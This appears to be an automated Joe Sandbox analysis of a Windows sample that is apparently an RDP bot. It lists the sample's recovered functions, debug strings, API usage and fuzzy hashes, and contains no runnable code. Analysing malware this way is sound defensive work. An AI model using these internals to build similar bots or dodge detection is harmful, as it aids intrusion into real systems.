                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                  • String ID: $(attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
                                                                                                                  • API String ID: 1799206407-3397184676
                                                                                                                  • Opcode ID: e21be7be9c16bb27528b034fe24b15d1ab511b8e353f145966fad9062a5d5940
                                                                                                                  • Instruction ID: a1328662b798af0db51706195d25e4eeab7327d7c63d75751b46a66acbcb2c09
                                                                                                                  • Opcode Fuzzy Hash: e21be7be9c16bb27528b034fe24b15d1ab511b8e353f145966fad9062a5d5940
                                                                                                                  • Instruction Fuzzy Hash: 0F5140A0A8C617D2FA20BB55E4503B92350BF1EB94F542132C96EC7EB7EE6DA945C301
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                                                                                                                  • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                                                                                                                  • API String ID: 1721699506-2819899730
                                                                                                                  • Opcode ID: 9249b8ac11bf0b6892439467737feea6e33b7a6a6b97775ca93be675124264c7
                                                                                                                  • Instruction ID: 7b62c06685310c7c1948f6b5765f244ad2a3dd3dc97ae0db493edb14e61b7182
                                                                                                                  • Opcode Fuzzy Hash: 9249b8ac11bf0b6892439467737feea6e33b7a6a6b97775ca93be675124264c7
                                                                                                                  • Instruction Fuzzy Hash: BE617E62E0C54791FB20BB58E8003B82291AF8F748F566036D55DC7AB7DE3DE94A8305
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen
                                                                                                                  • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                                                                                                                  • API String ID: 39653677-3302659514
                                                                                                                  • Opcode ID: a091d92821b1e82cfa39aaab01c8d8141344e235231bbb2c2f7fd8d648b90f23
                                                                                                                  • Instruction ID: 47ccc5b77d8d787d749b8bb60b868271392a108663fe56cae117f451d7eb5165
                                                                                                                  • Opcode Fuzzy Hash: a091d92821b1e82cfa39aaab01c8d8141344e235231bbb2c2f7fd8d648b90f23
                                                                                                                  • Instruction Fuzzy Hash: 9E415161A0DA4391FA21BF55E4503B42751BF4E748F985132D56EC7ABBEF3CE5068340
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$Processstrlen$AllocFree
                                                                                                                  • String ID: (buf != NULL)$(buf_sz != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
                                                                                                                  • API String ID: 1318626975-3964590784
                                                                                                                  • Opcode ID: 9aa4ad5710ba47d1f93b0edbb4dbda2cd6f3467b747c308e6e1de2fea1d8c66b
                                                                                                                  • Instruction ID: 25c4b536e266817d9e55489724414d9b7f61c45bc3bb84a5ac6800a86358e705
                                                                                                                  • Opcode Fuzzy Hash: 9aa4ad5710ba47d1f93b0edbb4dbda2cd6f3467b747c308e6e1de2fea1d8c66b
                                                                                                                  • Instruction Fuzzy Hash: 3E314161A0CA4785FAA1BF51E9083B92760AF4EB84F585031DA5DC7BB7DF3CE8168340
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile$ErrorLast
                                                                                                                  • String ID: (attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
                                                                                                                  • API String ID: 365566950-3085771803
                                                                                                                  • Opcode ID: f5911b0597268605da7c68ab9bf962752b1e02f0852cc6a06eb7331b6788ea4b
                                                                                                                  • Instruction ID: 5270bb7eaea2072813f12c1eb197920ff8e710ecf71c976561a6ff7f816c8fac
                                                                                                                  • Opcode Fuzzy Hash: f5911b0597268605da7c68ab9bf962752b1e02f0852cc6a06eb7331b6788ea4b
                                                                                                                  • Instruction Fuzzy Hash: 5A514D61A4C64786FB60BB24E4402B973A0AF0E754F686532D92EC7EB7DF2CE945C701
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseErrorFileHandleLastUnlockfflushfwrite
                                                                                                                  • String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
                                                                                                                  • API String ID: 497672076-1436771859
                                                                                                                  • Opcode ID: be40d166d65ee0fd826c179aebf8d274529e1f5329d112457eecbd3a16b0776b
                                                                                                                  • Instruction ID: b26f4cb17bfe9b78b3c70ae13d80762158f8afa3c89e874c1f90fb6314c87b5c
                                                                                                                  • Opcode Fuzzy Hash: be40d166d65ee0fd826c179aebf8d274529e1f5329d112457eecbd3a16b0776b
                                                                                                                  • Instruction Fuzzy Hash: F1418F61F0C54382FA70BB18E444BB95650AF5FBA8F102232C52EC7AF7DE2CA586C301
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$Process$AllocCriticalFileSection$AttributesCopyEnterFreeLeavefflushfwritememcpywcslen
                                                                                                                  • String ID: [E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc
                                                                                                                  • API String ID: 4155868088-3920367287
                                                                                                                  • Opcode ID: 98cc37affdbc9853e1a9166010f45109071c9e9919c2ed23c9d2c199f0cdb42d
                                                                                                                  • Instruction ID: fcbc13f4b9c6f42ff3b36760b6e22381d019274e68591eaf9518454125d23554
                                                                                                                  • Opcode Fuzzy Hash: 98cc37affdbc9853e1a9166010f45109071c9e9919c2ed23c9d2c199f0cdb42d
                                                                                                                  • Instruction Fuzzy Hash: E2313D21B0CA4782F660BB56E8807B96350AB4FB84F449031CA9DC7BB7DE3CE985C700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFileLastModuleName
                                                                                                                  • String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path$wfpblk.lock
                                                                                                                  • API String ID: 2776309574-2006444783
                                                                                                                  • Opcode ID: 4b8e4eb41ae9378e3f657afe959d27e4c49e50872b6dd60d7d795c4887aa8013
                                                                                                                  • Instruction ID: 51e469a416b953ad4c2f908da54e8992ed5356e581a81cc405b7437c37170970
                                                                                                                  • Opcode Fuzzy Hash: 4b8e4eb41ae9378e3f657afe959d27e4c49e50872b6dd60d7d795c4887aa8013
                                                                                                                  • Instruction Fuzzy Hash: 29313C61A0C95795FA11BF64E9107F52360BF0E749F885132EA5CD7AB7EE7CA905C300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFileLast$CloseCreateHandleSize
                                                                                                                  • String ID: (path != NULL)$(size != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
                                                                                                                  • API String ID: 3555958901-1687387729
                                                                                                                  • Opcode ID: 17a3905e18cdb1d8a85cd9336cce15a49220aaebdb1d37666bd8c7ae0042426b
                                                                                                                  • Instruction ID: 1a5425118033e129990ee972d740c8483ecf76d31ab03a5ce7e3d961d69e0b52
                                                                                                                  • Opcode Fuzzy Hash: 17a3905e18cdb1d8a85cd9336cce15a49220aaebdb1d37666bd8c7ae0042426b
                                                                                                                  • Instruction Fuzzy Hash: 5F615E55E0C11382FBA07A14E45437812609F4F378F696632C96EDBAF3DE6DAC845353
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastObjectSingleWait
                                                                                                                  • String ID: $(pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> WaitForSingleObject failed(pid=%lugle=%lu)$process_wait$~
                                                                                                                  • API String ID: 1211598281-4195011794
                                                                                                                  • Opcode ID: 0deb97dcf852c4bc4058bdc4b606e96b5df0ddae11b4762ffe8ba045f7a623f4
                                                                                                                  • Instruction ID: 5c3c41eda80feead2bda6b405171a579323f580ac251539fe62fc01afe1503f2
                                                                                                                  • Opcode Fuzzy Hash: 0deb97dcf852c4bc4058bdc4b606e96b5df0ddae11b4762ffe8ba045f7a623f4
                                                                                                                  • Instruction Fuzzy Hash: 3531C610E8C20782FB64B754E4C47786350AF4F318FA4A132C61FC7EB39E5DAD859242
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateErrorHandleLastTime
                                                                                                                  • String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
                                                                                                                  • API String ID: 2291555494-3647951244
                                                                                                                  • Opcode ID: 1580c463ac1a67233ffed9850a7684daecf6e87ee339f2778340ad3587e2fc21
                                                                                                                  • Instruction ID: 323f7cce8a92001e98194e65a9ea64fe8b326f4a6cb1b8083e837746e65e1954
                                                                                                                  • Opcode Fuzzy Hash: 1580c463ac1a67233ffed9850a7684daecf6e87ee339f2778340ad3587e2fc21
                                                                                                                  • Instruction Fuzzy Hash: FA518561E0C25382FBB47B10D4083796650AF0E7A8F196632D93DCBAF6DF2DAC458351
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                  • API String ID: 3513630032-2210897324
                                                                                                                  • Opcode ID: 0ca38be50db268a6cad6d239e6e380c7a805df0f1447118d3c9ec6f79f631668
                                                                                                                  • Instruction ID: ef307125b8cfcdda9e02660a5ff194cb359e68028d06359acf5218430875ea6a
                                                                                                                  • Opcode Fuzzy Hash: 0ca38be50db268a6cad6d239e6e380c7a805df0f1447118d3c9ec6f79f631668
                                                                                                                  • Instruction Fuzzy Hash: 76217E2260CA4695E361BF55E8407AA3761BB4E784F444036EE4CC7A76DF3DD886C700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Virtual$ErrorLastProtectQuery
                                                                                                                  • String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                  • API String ID: 637304234-2693646698
                                                                                                                  • Opcode ID: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
                                                                                                                  • Instruction ID: 1348ae997fd7bf55f38ed075bdea126dad51aa18254f2622cb0c9078a4d90539
                                                                                                                  • Opcode Fuzzy Hash: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
                                                                                                                  • Instruction Fuzzy Hash: D0319C75B0DA0286EA10BF11E8912A963A1EF8EB94F449135DE1DC77BADE3CE447C740
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _errno
                                                                                                                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                                                                                                                  • API String ID: 2918714741-1991603811
                                                                                                                  • Opcode ID: fe742d66581b0ccb4e8f88428579443916f0f27324e58e89ecaf8bb4bd76b93c
                                                                                                                  • Instruction ID: d4cd75870040db3db0e95fb3337f3ba310cdb02a4a8b2828e8bd5fd9d9bd28eb
                                                                                                                  • Opcode Fuzzy Hash: fe742d66581b0ccb4e8f88428579443916f0f27324e58e89ecaf8bb4bd76b93c
                                                                                                                  • Instruction Fuzzy Hash: 9F218822A0CA4792E361BF51E840BAA7760BB4E784F145035EE5DC7A76DF3DE846C700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                                                                                                                  • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                                                                                                  • API String ID: 1211020085-2360327764
                                                                                                                  • Opcode ID: 2496d2f5fa8d00559008dfae579644d76cd319a1d0937b540e789750984efad3
                                                                                                                  • Instruction ID: be1cc086460238fa9ec655e87508360933785f8120788ccc3c82c3f2d17f206f
                                                                                                                  • Opcode Fuzzy Hash: 2496d2f5fa8d00559008dfae579644d76cd319a1d0937b540e789750984efad3
